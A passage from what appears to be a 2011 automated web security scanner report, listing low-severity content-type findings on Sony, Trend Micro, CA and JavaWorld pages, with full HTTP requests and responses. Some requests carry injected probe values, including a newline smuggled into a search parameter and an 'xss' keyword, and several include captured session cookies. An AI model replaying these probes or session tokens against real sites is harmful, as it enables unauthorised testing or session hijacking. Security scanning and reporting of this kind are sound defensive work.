fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OK ntCoent-Length: 811Content-Type: text/html Content-Language: en-US Content-Length: 811 Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/ Cache-Control: private {"ResultSet": { "suggestionList": [ { "value": "XSS680CX", "description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers", "img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
19.3. http://wd.sharethis.com/api/getCount2.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Request
GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 17:46:04 GMTContent-Type: text/html Connection: keep-alive Content-Length: 270 (function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\...[SNIP]...
19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/bg_323232.html
Request
GET /selfservice/common/bg_323232.html HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"67-1196120688000" Last-Modified: Mon, 26 Nov 2007 23:44:48 GMTContent-Type: text/html Content-Length: 67 Date: Tue, 06 Sep 2011 18:51:21 GMT <html> <head> </head> <body bgcolor="#323232"> </body> </html>
20. Content type incorrectly stated
previous
next
There are 6 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
20.1. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /?aid=244&tax=trend_micro HTTP/1.1 Host: display.digitalriver.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/home/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:02 GMT Server: Apache/2.2.9 Expires: Tue, 06 Sep 2011 18:43:02 GMT Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT Content-Length: 206 Connection: closeContent-Type: text/html var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro'; document.getElementsByTagName('head')[0].appendChild(dgt_scr...[SNIP]...
20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OK ntCoent-Length: 811Content-Type: text/html Content-Language: en-US Content-Length: 811 Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/ Cache-Control: private {"ResultSet": { "suggestionList": [ { "value": "XSS680CX", "description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers", "img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
20.3. https://store.trendmicro.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://store.trendmicro.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: store.trendmicro.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000
Response
HTTP/1.1 200 OK ETag: "37e-4b6b21a0"Content-Type: text/plain Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0) Content-Length: 894 Date: Thu, 02 Jun 2011 21:05:38 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app93 Accept-Ranges: bytes ..............h.......(....... ...............H...H...........................................................VVW .....tOL+. ...Q. ...[SNIP]...
20.4. http://wd.sharethis.com/api/getCount2.php
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 17:46:04 GMTContent-Type: text/html Connection: keep-alive Content-Length: 270 (function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\...[SNIP]...
20.5. https://www.ca.com/images/icons/checkmark.gif
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.ca.com
Path:
/images/icons/checkmark.gif
Issue detail
The response contains the following Content-type statement:The response states that it contains a GIF image . However, it actually appears to contain a PNG image .
Request
GET /images/icons/checkmark.gif HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OKContent-Type: image/gif Last-Modified: Mon, 01 Mar 2010 16:18:10 GMT Accept-Ranges: bytes ETag: "d4c6ebc85ab9ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:25:52 GMT Content-Length: 1046 .PNG . ...IHDR.............a.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...@.9<.6=.6...............C.=J.D......A.;s.o{.wA.:7.0;.4p.kH.A.........b.^e.a...Q.K.....[SNIP]...
20.6. http://www.javaworld.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=50.23.123.106.1315331151623899; CP=null*; __utma=51115954.1360305783.1315349155.1315349155.1315349155.1; __utmb=51115954.1.10.1315349155; __utmc=51115954; __utmz=51115954.1315349155.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=acegisecurity; __switchTo5x=31; __unam=80e81ea-13240eb6f64-4c95886-1
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:46:07 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Thu, 02 Oct 2008 19:34:55 GMT ETag: "73408d-47e-4584a4fb615c0" Accept-Ranges: bytes Content-Length: 1150 Cache-Control: public, max-age=600 Cneonction: closeContent-Type: text/plain; charset=UTF-8 ............ .h.......(....... ..... ......................................................................................................................................................................[SNIP]...
21. Content type is not specified
previous
next
There are 4 instances of this issue:
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
21.1. http://www.javalobby.org/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1 Host: www.javalobby.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=abcalXcWOWKw_8jKx4-it; __utma=125574289.255423471.1315349166.1315349166.1315349166.1; __utmb=125574289; __utmc=125574289; __utmz=125574289.1315349166.1.1.utmccn=(organic)|utmcsr=google|utmctr=acegisecurity|utmcmd=organic; __qca=P0-26411862-1315349166480
Response
HTTP/1.1 200 OK Server: Resin/3.2.1 ETag: "+Rv4b+Thyy2" Last-Modified: Fri, 18 Feb 2005 16:02:25 GMT Cache-Control: max-age=5 Expires: Tue, 06 Sep 2011 17:55:43 GMT Content-Length: 1406 Date: Tue, 06 Sep 2011 17:55:38 GMT ..............h.......(....... ....................................N8..si..}b..tn..._...g...h...v..........................................................................................................[SNIP]...
21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1
Request
GET /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353083271
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"574-1314988493617" Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT Content-Length: 574 Date: Tue, 06 Sep 2011 18:51:16 GMT GIF89a.......DDD.rVw.....-s....y~r..q.>.KKK...spaf..Id...W....UG..L?u.!l....WVV..R)....p...........|..)........j..&....a,..w.._..HV..}.'fff...dmW......?.......P..{..^..r..x..6.iW.yH.....u.....M`..\bh....[SNIP]...
21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1
Request
GET /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353081761
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"79-1314988493992" Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT Content-Length: 79 Date: Tue, 06 Sep 2011 18:51:15 GMT GIF89a...................!.......,.......... ............s.M.| F.Y...m.......;
21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
Request
GET /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353359592
Response
